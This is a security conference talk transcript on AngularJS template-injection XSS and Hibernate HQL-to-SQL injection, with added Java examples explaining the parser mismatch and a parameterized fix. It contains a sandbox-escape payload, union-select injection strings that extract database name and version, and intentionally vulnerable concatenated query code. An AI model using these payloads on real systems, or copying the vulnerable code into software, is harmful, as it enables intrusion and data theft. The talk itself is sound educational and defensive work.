
Advanced XSS and Injection Attacks

Presentation on XSS in AngularJS and Hibernate SQL Injection given at Security BSides Boston 2016.

Links to the demo applications:

https://github.com/caseydunham/angularjs-sandbox
https://github.com/caseydunham/hibernate-sandbox

Casey Dunham

May 21, 2016

Transcript

  1. Advanced XSS and
    Injection Attacks

  2. Agenda
    • Introduction
    • AngularJS Expressions
    • AngularJS XSS
    • HQL SQLi
    • Prevention
    • Q + A

  3. Introduction
    • Casey Dunham
    • Security Consultant for GuidePoint Security
    • Application Security
    • Code Reviews
    • Assessments
    • OWASP Maine
    • DC207
    • TOOOL
    @CaseyDunham
    @GuidePointSec

  4. AngularJS Expressions

  6. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart
    ...

  12. Versus JavaScript Expressions
    • Evaluated against a scope object
    • Evaluation is forgiving to undefined and null
    • Filters can be used to format data before displaying it
    • No Control Flow Statements
    • No Function Declarations
    • No RegExp Creation With Literal Notation
    • No Object Creation With New Operator
    • No Bitwise, Comma, And Void Operators

  13. AngularJS XSS

  14. Prior Research
    • Gareth Heyes (PortSwigger)
    • XSS without HTML: Client-Side Template Injection with AngularJS
    • http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

  15. Sandbox Escape
    {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');
    }}

  20. DEMO

  21. Hibernate Overview

  22. Prior Research
    • Mikhail Egorov / Sergey Soldatov
    • ORM2Pwn: Exploiting Injections in Hibernate ORM
    • Zeronights 0x05
    • New Methods for Exploiting ORM Injections in Java Applications
    • HITB 2016 (Later this May)

  23. • Renaud Dubourguais
    • HQL : Hyperinsane Query Language
    • Safety Symposium on Information and Communication Technologies (SSTIC) 2015

  24. “Hibernate ORM (Hibernate in short) is an object-relational mapping
    framework for the Java language. It provides a framework for mapping
    an object-oriented domain model to a relational database.”
    - Wikipedia

  25. “Hibernate's primary feature is mapping from Java classes to database
    tables; and mapping from Java data types to SQL data types.”
    - Wikipedia

  27. public class Customer {
        private Long id;
        private String name;
        private String accountId;

        public Long getId() {
            return id;
        }

        public void setId(Long id) {
            this.id = id;
        }

        // Accessors elided on the slide; the JDBC code on the next slide calls them.
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public String getAccountId() { return accountId; }
        public void setAccountId(String accountId) { this.accountId = accountId; }
    }

    The table the class maps to:

    id  name  account_id
    1   acme  acme_123
    2   abc   abc_789
    3   xyz   xyz_3843

  28. // Plain JDBC: the ? marker keeps the account id out of the SQL text
    String sql = "SELECT id, name, account_id "
               + "FROM Customers WHERE account_id = ?";
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, "acme_123");
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
        long id = rs.getLong("id");
        c.setId(id);
        String name = rs.getString("name");
        c.setName(name);
        String accountId = rs.getString("account_id");
        c.setAccountId(accountId);
    }

  33. String accountId = request.getParameter("accountId");
    String hql = "from Customer c where c.accountId = :accountId";
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

  38. @Entity
    @Table(name = "customer")
    public class Customer {
        @Id
        @GeneratedValue(
            strategy = GenerationType.IDENTITY
        )
        private Long id;

        @Column(
            name = "name",
            nullable = false
        )
        private String name;

        @Column(
            name = "account_id",
            nullable = false
        )
        private String accountId;

        // getters and setters as before
    }

    The table the entity maps to:

    id  name  account_id
    1   acme  acme_123
    2   abc   abc_789
    3   xyz   xyz_3843

  39. Exploiting HQL Queries

  40. Hibernate Query Language
    • Similar to SQL
    • Fully Object Oriented
    • Uses mapped objects and their properties
    • More limited than SQL

  41. from Customer c where c.accountId = 'acme_123'
    Customer   = Mapped Object
    c          = Object Alias
    accountId  = Object Property

  42. Can Still Be Vulnerable To Injection
    public List findAllCustomersLike(String query) {
        Session session = getSession();
        // user input is spliced straight into the HQL text
        String hql = "from Customer c "
                   + "where c.name like '%" + query + "%'";
        Query q = session.createQuery(hql);
        return (List) q.list();
    }

  46. Let’s Fix Our Injection
    String hql = "from Customer c "
               + "where c.name "
               + "like '%" + query + "%'";

  47. Let’s Fix Our Injection
    String query = "' or 1=1 or ''='";
    String hql = "from Customer c "
               + "where c.name "
               + "like '%" + query + "%'";

  48. Let’s Fix Our Injection
    String hql = "from Customer c "
               + "where c.name "
               + "like '%" + "' or 1=1 or ''='" + "%'";

  49. Success!

  50. So Now What?
    • Enumerate other columns (properties)?
    • Access other mapped objects?

  51. Screw that and let’s just get to the fun stuff.

  52. Blind SQLi

  53. HQL Injection SQL Injection

  54. Escaping HQL
    • In HQL the \ is a valid character
    • In HQL to escape a ' we use ''
    • Can combine these to pass along our SQL Injection through HQL

  56. Success!
    • We can now continue along with a normal SQL Injection
    • But…
    • SQL needs to be Valid
    • HQL needs to be Valid as well

  57. Here’s where it gets tricky

  58. String hql = "from Customer c "
               + "where c.name like '%" + query + "%'";   // injection here

  59. http://localhost/search?q=test

  60. q=test' and 1='1

  62. q=test' and '1\''=1 -- '='1

  63. q=test' and '1\''=1 union select 1,database(),3-- '='1

  65. q=test' and '1\''=1 union select 1,database(),version()-- '='1

  66. w00t!

  67. select
        customer0_.id as id1_0_,
        customer0_.account_id as account_2_0_,
        customer0_.name as name3_0_
    from
        customers customer0_
    where
        (
            customer0_.name like '%test'
        )
        and '1\''=1 union select 1,database(),version()-- '='1%'
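The generated SQL above only makes sense once you see that the HQL parser and the MySQL parser cut the same text at different places. The following class is an added example, not part of the deck or of the hibernate-sandbox application: it emulates the two literal rules the deck states (HQL treats '' as an escaped quote and \ as an ordinary character; MySQL, in its default sql_mode, treats '' as an escaped quote and \ as an escape for the next character) and runs both over the tail of the query from the slide. The class and method names are hypothetical; the only input is the text already shown above.

```java
/*
 * Added example, not from the deck: emulate how two lexers delimit a
 * single-quoted string literal.
 *   HQL   (as the deck describes it): '' is an escaped quote; \ is an ordinary character.
 *   MySQL (default sql_mode):         '' is an escaped quote; \ escapes the next character.
 * The same text is therefore cut at different places by the two parsers.
 */
public class LiteralSpans {

    /** Index just past the closing quote of the literal that opens at 'start', or -1. */
    static int literalEnd(String s, int start, boolean backslashEscapes) {
        if (s.charAt(start) != '\'') {
            throw new IllegalArgumentException("no literal opens at index " + start);
        }
        int i = start + 1;
        while (i < s.length()) {
            char c = s.charAt(i);
            if (backslashEscapes && c == '\\') {
                i += 2;                        // \x consumes the next character
            } else if (c == '\'') {
                if (i + 1 < s.length() && s.charAt(i + 1) == '\'') {
                    i += 2;                    // '' is an escaped quote, still inside
                } else {
                    return i + 1;              // a lone quote closes the literal
                }
            } else {
                i++;
            }
        }
        return -1;                             // unterminated literal
    }

    /** The literal as the parser sees it, followed by the text left over after it. */
    static String[] split(String s, int start, boolean backslashEscapes) {
        int end = literalEnd(s, start, backslashEscapes);
        if (end < 0) {
            return new String[] { s.substring(start), "" };
        }
        return new String[] { s.substring(start, end), s.substring(end) };
    }

    public static void main(String[] args) {
        // Tail of the generated SQL from the slide; the Java source needs \\ for the
        // single backslash that appears in the query text.
        String tail = "'1\\''=1 union select 1,database(),version()-- '='1%'";

        String[] hql   = split(tail, 0, false);   // HQL rule: backslash is ordinary
        String[] mysql = split(tail, 0, true);    // MySQL rule: backslash escapes

        System.out.println("HQL   literal: " + hql[0]);
        System.out.println("HQL   rest   : " + hql[1]);
        System.out.println("MySQL literal: " + mysql[0]);
        System.out.println("MySQL rest   : " + mysql[1]);
    }
}
```

Run as written, the HQL rule swallows everything up to the quote after the comment marker, so Hibernate sees a syntactically valid comparison between two string literals (the long one and '1%') and passes the text through, re-escaping the inner quote as '' but leaving the backslash alone, which is why the SQL text matches the HQL text. The MySQL rule closes the literal right after the backslash-quote pair, so everything from =1 union select onward is executed as SQL. The practical lesson for reviewers is that no amount of HQL-level validation or quote doubling is a substitute for a bound parameter: the two parsers disagree on where the data ends.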

  68. Prevention

  69. Prevention is the same as all SQL Injection

  70. Don’t use String Concatenation To Build Queries!!

  71. String accountId = request.getParameter("accountId");
    String hql = "from Customer c where c.accountId = :accountId";
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

  72. • Look for calls to
      • createQuery
      • createSQLQuery
    • All take HQL strings that could have potential for Injection.
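The parameterized lookup above covers an equality match; the search from the "Can Still Be Vulnerable To Injection" slide is a LIKE, which needs one more step because % and _ are wildcards inside the bound value. The class below is an added example, not code from the deck or from the hibernate-sandbox application: it rewrites findAllCustomersLike with a named parameter, keeps the wildcards in the code rather than in the caller's input, and declares ! as the LIKE escape character so the backslash behaviour the deck describes never comes into play. Customer is the entity from the deck; the helper names are hypothetical, and the example assumes the org.hibernate.Query API used on the slides (Hibernate 4.x / 5.0-5.1; Hibernate 5.2 and later deprecate it in favour of org.hibernate.query.Query).

```java
import java.util.List;

import org.hibernate.Query;     // assumption: Hibernate 4.x / 5.0-5.1 API, as on the slides
import org.hibernate.Session;

/*
 * Added example, not from the deck or the demo application: the vulnerable
 * findAllCustomersLike rewritten with a bound parameter. The HQL text is a
 * constant; the user's search term only ever travels as a parameter value.
 */
public class CustomerSearch {

    /** Escape the LIKE metacharacters so a search term cannot widen the match. */
    static String escapeLikeWildcards(String term) {
        StringBuilder sb = new StringBuilder(term.length());
        for (char c : term.toCharArray()) {
            if (c == '!' || c == '%' || c == '_') {
                sb.append('!');         // '!' is the escape character declared in the HQL below
            }
            sb.append(c);
        }
        return sb.toString();
    }

    /** Build the bound value: the wildcards belong to the code, never to the caller. */
    static String containsPattern(String term) {
        return "%" + escapeLikeWildcards(term) + "%";
    }

    /** Safe replacement for the slide's findAllCustomersLike. */
    @SuppressWarnings("unchecked")
    public static List<Customer> findAllCustomersLike(Session session, String term) {
        // The query string is constant, so a reviewer grepping createQuery can see
        // at a glance that no request data is concatenated into it.
        String hql = "from Customer c where c.name like :pattern escape '!'";
        Query q = session.createQuery(hql);
        q.setParameter("pattern", containsPattern(term));
        return (List<Customer>) q.list();
    }
}
```

With this version the slide's test input ' or 1=1 or ''=' becomes the bound value %' or 1=1 or ''='% and is compared as data, so the quotes never reach the HQL parser; a term such as 50% is bound as %50!%% and matches only names that literally contain "50%". Choosing ! instead of \ as the escape character sidesteps the backslash handling that the deck relies on for the HQL-to-SQL escape trick, and it keeps the HQL readable in a code review, where the thing to check for each createQuery and createSQLQuery call is simply that its argument is a constant.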

  73. Q + A

  74. Thank You!

  75. @CaseyDunham
